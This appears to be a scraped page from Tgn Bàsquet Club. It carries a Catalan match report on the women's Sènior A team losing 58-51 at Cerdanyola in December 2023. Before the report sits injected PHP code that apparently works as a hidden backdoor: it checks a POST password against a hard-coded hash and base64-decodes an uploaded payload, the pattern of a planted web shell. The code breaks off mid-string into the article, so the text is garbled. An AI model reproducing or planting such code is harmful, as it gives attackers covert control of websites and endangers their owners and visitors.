function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN competeix fins al final a Cerdanyola (58-51) - Tgn Bàsquet Club -

El TGN competeix fins al final a Cerdanyola (58-51)

Updated: desembre 3, 2023

Partit corresponent a la onzena jornada de la nova competició de la FCBQ Supercopa Catalunya femenina, on el Sènior A visitava la pista del CBF Cerdanyola, equip que es trobava amb el mateix balanç que les liles (5 victòries i 5 derrotes).

El partit ha començat amb un intercanvi de cops durant gran part del primer quart (11-11 al minut 8), però una desconnexió del conjunt lila ha donat el primer avantage al quadre local (18-13). El segon quart ha seguit la dinàmica del últims minuts del primer: les jugadores locals han sigut superiors a les tarragonines i han seguit augmentant la renda al marcador gràcies en gran part al domini en el rebot als 2 cèrcols. El marcador al descans era de 34-22.

Després del pas dels vestidors s’ha pogut veure una millor versió del TGN, que ha aconseguit retallar la diferència per sota dels 10 punts, però novament l’encert de les locals ha tornat a eixamplar el marcador fins als 14 punts (48-34 al final del 3r quart). Tot i això, el TGN no es pensava donar per vençut i la reacció lila ha estat a punt de capgirar el marcador gràcies a un parcial de 2-12 en els primers 5 minuts de l’últim quart. Malauradament pels interessos del TGN, les locals han sapigut gestionar millor el final del partit i han aconseguit sumar el triomf gràcies a l’alt percentatge en els tirs lliures finals.

La bona notícia del partit l’ha protagonitzat la Paula Ibáñez, que ha tornat a vestir-se de curt i ha debutat aquesta temporada després de superar la seva lesió. Quin goig tornar-te a veure a pista Paula!

A la propera jornada, el TGN rebrà la visita del Joventut les Corts el diumenge 17 de desembre a les 19:00h, partit que vindrà precedit per la presentació dels equips del club.